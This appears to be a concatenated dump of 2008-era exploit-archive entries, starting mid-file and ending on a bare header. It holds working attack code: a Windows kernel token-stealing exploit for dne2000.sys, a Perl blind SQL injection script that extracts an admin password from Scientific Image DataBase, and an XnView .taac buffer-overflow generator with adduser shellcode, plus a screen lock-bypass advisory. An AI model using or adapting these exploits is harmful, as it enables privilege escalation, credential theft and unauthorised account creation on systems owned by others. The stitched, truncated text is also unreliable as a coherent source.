"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xd8\x00\x00\x00"
"\x89\x88\xd8\x00\x00\x00"
"\x90";

static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\x70\x44"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xc8\x00\x00\x00"
"\x89\x88\xc8\x00\x00\x00"
"\x90";

static unsigned char win32_ret[] =
"\x5e"
"\xc2\x10\x00";

struct ioctl_func {
char _pad[0x04];
int flag;
char __pad[0x2C];
void *func_ptr;
};

struct ioctl_item {
int flag;
char _pad[0x24];
struct ioctl_func *item_func;
struct ioctl_item *item_ptr;
};

struct ioctl_req {
int req_num;
struct ioctl_item *ptr[2];
};

static PCHAR
fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;

dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

if (dwMajorVersion != 5)
{
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);

case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);

default:
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

return (NULL);
}

int
main (int argc, char **argv)
{
struct ioctl_req req;
struct ioctl_item items[2];
struct ioctl_func funcs;
LPVOID zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;

printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
"by: \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

if (argc <= 1)
{
fprintf (stderr, "Usage: %s \n", argv[0]);
exit (EXIT_SUCCESS);
}

ppid = atoi (argv[1]);

hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}

zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);

memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);

memset (&req, 0, sizeof req);
req.req_num = DNE_FLAG;
req.ptr[0] = NULL;
req.ptr[1] = &items[0];

memset (items, 0, sizeof items);
items[0].flag = ITEM_FLAG_1;
items[0].item_ptr = &items[1];

items[1].flag = ITEM_FLAG_2;
items[1].item_func = &funcs;

memset (&funcs, 0, sizeof funcs);
funcs.flag = FUNC_FLAG;
funcs.func_ptr = zpage;

printf ("* req.ptr: 0x%08X\n", &items[0]);
printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n",
&items[0], items[0].flag, items[0].item_ptr);
printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
items[0].item_ptr, items[1].flag, items[1].item_func);
printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n",
items[1].item_func, funcs.flag, funcs.func_ptr);

/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DNE_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");

CloseHandle (hFile);

return (EXIT_SUCCESS);
}

screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

###################################
#screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)
###################################

_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, realy..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not found a Advisory related to this so I decided to write a leet one.

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Have fun!

Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit

###################################
#Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit
###################################

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrives the admin username/password via blind mysql injection.


print <-------------------------------------
- Scientific Image DataBase <= 0.41 -
- Blind SQL Injection Exploit -
- -
- Coded && Discovered By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
- cipher, milw0rm -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
chomp(my $url=);

my ($substr, $done, $chr, $res) = (1, 1, 48, "");

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

while($done) {
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);

if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
print "Username: sysadmin Password: ".$res."\n";
exit;

XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit

###################################
#XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit
###################################

#include
#include
/*
XnView 1.93.6 for Windows .taac buffer overflow proof of concept.

The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/

Exploit code by Shinnok raydenxy@yahoo.com
http://www.rstcenter.com

This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows
will cause a buffer overflow and add an user "test" with password "test".
Tested on Windows XP sp2&sp3.

greetz to escalation666
/*

/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf"
"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b"
"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57"
"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13"
"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78"
"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a"
"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95"
"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76"
"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a"
"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b"
"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d"
"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70"
"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a"
"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d"
"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e";


unsigned char ra_sp2[] = "\xed\x1e\x94\x7c";
unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b";

unsigned char nops1[257]; //256 * \x90
unsigned char nops2[21]; //20 * \x90

int main(int argc, char **argv)
{
int i;
FILE* f;
printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n");
printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n");
printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n");
if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){
printf("Usage: %s target\n",argv[0]);
printf("Where target is:\n");
printf("0: WinXP SP2\n");
printf("1: WinXP SP3\n");
printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n");
return EXIT_SUCCESS;
}
for(i=0;i<256;i++) nops1[i]='\x90';
nops1[256]='\0';
for(i=0;i<14;i++) nops2[i]='\x90';
nops2[20]='\0';
if(atoi(argv[1])==0) {
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa');
}else{
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa');
}
fclose(f);
printf("sploit.taac created!\n");
printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n");
printf("Then check with \"net user\" or from control panel for the user account test.\n");
return EXIT_SUCCESS;
}

muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit

###################################
#muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit
###################################